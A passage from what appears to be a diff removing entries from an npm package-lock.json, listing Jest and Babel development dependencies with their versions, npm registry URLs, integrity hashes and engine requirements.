"https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^2.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.0.tgz", - "integrity": "sha512-+n8dL/9GWblDO0iU6eZAwEIJVr5DWigtle+Q6HLOrh/pdbXOhOtqzq8VPPE2zvNJzSKY4vH/z3iT3tn0A3ypiQ==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.18.3", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.18.3.tgz", - "integrity": "sha512-1kbcJ40lLB7MHsj39U4Sh1uTd2E7rLEa79kmDpI6cy+XiXsteB3POdQomoq4FxszMrO3ZYchkhYJw7A2862b3w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.3.0" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "18.11.18", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.11.18.tgz", - "integrity": "sha512-DHQpWGjyQKSHj3ebjFI/wRKcqQcdR+MoFBygntYOZytCqNfkd2ZC4ARDJ2DQqhjH5p85Nnd3jhUJIXrszFX/JA==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.5", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.5.tgz", - "integrity": "sha512-tUkiguQGW7S3IhB7N+c2MV/HZPSCPAAiYBZXLsBhFB/PCy6ZKKsZrmBayHV9fdGV/ARIfJ14NkxKzRDjvp7L6w==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001449", - "electron-to-chromium": "^1.4.284", - "node-releases": "^2.0.8", - "update-browserslist-db": "^1.0.10" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001450", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001450.tgz", - "integrity": "sha512-qMBmvmQmFXaSxexkjjfMvD5rnDL0+m+dUMZKoDYsGG8iZN29RuYh9eRoMvKsT6uMAWlyUUGDEQGJJYjzCIO9ew==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.284", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", - "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": 